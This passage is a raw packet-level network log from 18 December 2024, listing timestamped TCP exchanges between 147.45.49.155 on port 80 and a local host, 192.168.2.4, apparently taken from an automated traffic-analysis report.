                                                                              Dec 18, 2024 21:00:20.453721046 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.453742981 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.453811884 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.460377932 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.460398912 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.460463047 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.466974974 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.466994047 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.467139006 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.473510981 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.473531961 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.473545074 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.473597050 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.473597050 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.480003119 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.480017900 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.480082035 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.486535072 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.486547947 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.486690044 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.492966890 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.492980957 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.493228912 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.499249935 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.499264956 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.499278069 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.499321938 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.505646944 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.505676031 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.505717993 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.511723995 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.511746883 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.511776924 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.517997026 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.518008947 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.518147945 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.524060965 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.524075985 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.524159908 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.530070066 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.530083895 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.530096054 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.530150890 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.530150890 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.536246061 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.536261082 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.536361933 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.542355061 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.542370081 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.542520046 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.548424006 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.548439026 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.548521996 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.554384947 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.557391882 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.557406902 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.557423115 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.557488918 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.557488918 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.563364029 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.563376904 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.563534975 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.569103003 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.569114923 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.569591999 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.574774981 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.574789047 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.574933052 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.580497980 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.580516100 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.580528021 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.580785036 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.586323023 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.586338043 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.586442947 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.591955900 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.591969013 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.592031002 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.597716093 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.597728968 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.597814083 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.603224993 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.603245974 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.608464003 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.608876944 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.608889103 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.608899117 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.608963966 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.608963966 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.614239931 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.614272118 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.614540100 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.619813919 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.619843006 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.619956970 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.625426054 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.625441074 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.625833035 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.631036997 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.631050110 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.631059885 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.631263971 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.636502981 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.636524916 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.636698008 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.642044067 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.642066956 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.642235041 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.647488117 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.647509098 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.647612095 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.652940989 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.652956009 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.653072119 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.658320904 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.658334017 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.658343077 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.658446074 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.658446074 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.663605928 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.663645029 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.663829088 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.668912888 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.668926954 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.668983936 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.674124956 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.674139023 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.674249887 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.679246902 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.681921959 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.681934118 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.681943893 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.681998968 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.682058096 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.687171936 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.687186956 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.687315941 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.692301989 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.692315102 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.692389965 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.697434902 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.697448969 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.697603941 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.702678919 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.702693939 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.702706099 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.703239918 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.707783937 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.707801104 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.707868099 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.712786913 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.712800980 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.712927103 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.717839956 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.717854977 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.718015909 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.722965002 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.722979069 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.723339081 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.727838039 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.727853060 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.727864981 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.727921009 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.727921009 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.732734919 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.732748985 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.733122110 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.737567902 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.737587929 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.737653971 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.742470026 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.742484093 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.742681026 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.747404099 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.747417927 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.747427940 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.747473001 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.752183914 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.752197981 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.752234936 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.756973982 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.756988049 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.757390976 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.761730909 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.761749983 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.762031078 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.766499043 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.766511917 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.766594887 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.771240950 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.771264076 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.771275043 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.771337986 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.771353960 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.775913000 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.775926113 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.775991917 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.780605078 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.780616999 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.780869007 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.785295963 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.785310030 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.785372019 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.789952993 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.792222977 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.792244911 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.792258024 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.792290926 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.792331934 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.796902895 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.796915054 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.797070980 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.801624060 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.801649094 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.801733017 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.805984020 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.806000948 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.806129932 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.810509920 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.810554981 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.810566902 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.810827017 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.814893961 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.814908028 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.815041065 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.819390059 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.819403887 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.819494963 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.823834896 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.823849916 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.823890924 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.828290939 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.828305006 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.828409910 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.832674026 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.832688093 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.832694054 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.832844973 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.837157965 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.837173939 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.837398052 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.841470957 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.841485977 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.841574907 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.845880032 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.845894098 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.845964909 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.850282907 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.850296974 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.850308895 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.850418091 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.854676008 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.854688883 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.854885101 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.858972073 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.858985901 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.859044075 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.863308907 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.863336086 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.863805056 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.867703915 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.867719889 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.867801905 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.871813059 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.871826887 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.871840954 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.871902943 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.871937990 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.876162052 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.876177073 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.876247883 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.880419970 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.880434036 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.880637884 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.884691954 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.884706974 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.884989977 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.888928890 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.891094923 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.891109943 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.891122103 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.891220093 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.891220093 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.895261049 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.895287037 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.895358086 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.899478912 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.899492979 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.899540901 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.903664112 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.903678894 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.903767109 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.907880068 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.907902002 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.907913923 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.907991886 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.912189960 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.912203074 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.912312031 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.916162968 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.916176081 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.916277885 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.920161009 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.920175076 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.920259953 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.924247980 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.924269915 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.924362898 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.928740025 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.928755045 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.928767920 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.928816080 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.928816080 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.932313919 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.932327986 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.932432890 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.936342001 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.936357021 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.936440945 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.940254927 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.940269947 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.940326929 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.944233894 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.944248915 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.944262981 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.944411993 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.948231936 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.948247910 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.948411942 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.952183008 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.952198029 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.952594995 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.956111908 CET8049733147.45.49.155192.168.2.4
